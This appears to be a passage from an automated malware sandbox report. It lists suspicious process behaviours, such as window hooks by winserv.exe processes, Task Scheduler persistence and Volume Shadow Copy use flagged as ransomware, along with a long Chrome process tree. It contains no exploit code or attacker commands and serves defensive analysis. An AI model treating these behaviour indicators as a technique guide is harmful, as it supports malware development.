1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
1476	Setup.exe
2936	GameGuard.exe
2936	GameGuard.exe
2936	GameGuard.exe
2936	GameGuard.exe
2936	GameGuard.exe
2936	GameGuard.exe
2516	update.exe
2516	update.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
2652	rundll32.exe
2124	qbittorrent.exe
1516	taskmgr.exe
2444	unsecapp.exe
3732	taskmgr.exe

Suspicious behavior: LoadsDriver 18 IoCs

pid	Process
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found
3200	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe
Token: SeShutdownPrivilege	2612	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2612	chrome.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe

Suspicious use of SetWindowsHookEx 51 IoCs

pid	Process
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2124	qbittorrent.exe
2464	winserv.exe
2464	winserv.exe
2464	winserv.exe
2464	winserv.exe
1684	winserv.exe
1684	winserv.exe
1684	winserv.exe
1684	winserv.exe
3488	winserv.exe
3488	winserv.exe
3488	winserv.exe
3488	winserv.exe
3528	winserv.exe
3528	winserv.exe
3528	winserv.exe
3528	winserv.exe
3948	winserv.exe
3948	winserv.exe
3948	winserv.exe
3948	winserv.exe
3424	winserv.exe
3424	winserv.exe
3424	winserv.exe
3424	winserv.exe
3108	winserv.exe
3108	winserv.exe
3108	winserv.exe
3108	winserv.exe
1560	winserv.exe
1560	winserv.exe
1560	winserv.exe
1560	winserv.exe
3752	winserv.exe
3752	winserv.exe
3752	winserv.exe
3752	winserv.exe
2176	winserv.exe
2176	winserv.exe
2176	winserv.exe
2176	winserv.exe
2516	winserv.exe
2516	winserv.exe
2516	winserv.exe
2516	winserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1912 wrote to memory of 2652	1912	cmd.exe	29
PID 1912 wrote to memory of 2652	1912	cmd.exe	29
PID 1912 wrote to memory of 2652	1912	cmd.exe	29
PID 2612 wrote to memory of 2544	2612	chrome.exe	31
PID 2612 wrote to memory of 2544	2612	chrome.exe	31
PID 2612 wrote to memory of 2544	2612	chrome.exe	31
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1760	2612	chrome.exe	33
PID 2612 wrote to memory of 1004	2612	chrome.exe	34
PID 2612 wrote to memory of 1004	2612	chrome.exe	34
PID 2612 wrote to memory of 1004	2612	chrome.exe	34
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35
PID 2612 wrote to memory of 2604	2612	chrome.exe	35

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\download_5fdg452d.torrent
1⤵
- Suspicious use of WriteProcessMemory
PID:1912
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\download_5fdg452d.torrent
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7709758,0x7fef7709768,0x7fef7709778
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:2
  2⤵
  PID:1760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:1004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2196 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2204 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1272 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:2
  2⤵
  PID:948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1428 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3392 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2996 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3420 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3684 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3680 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3572 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2196 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3968 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4076 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4200 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4240 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4492 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=2112 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4464 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3836 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:1172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4360 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:1212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4128 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2964 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2092
- C:\Users\Admin\Downloads\qbittorrent_4.6.4_x64_setup.exe
  "C:\Users\Admin\Downloads\qbittorrent_4.6.4_x64_setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4444 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2728 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=4072 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=2796 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4232 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=2936 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=4532 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=3760 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=580 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=2660 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=2932 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=3808 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1552
- C:\Program Files\Google\Chrome\Application\chrome.exe
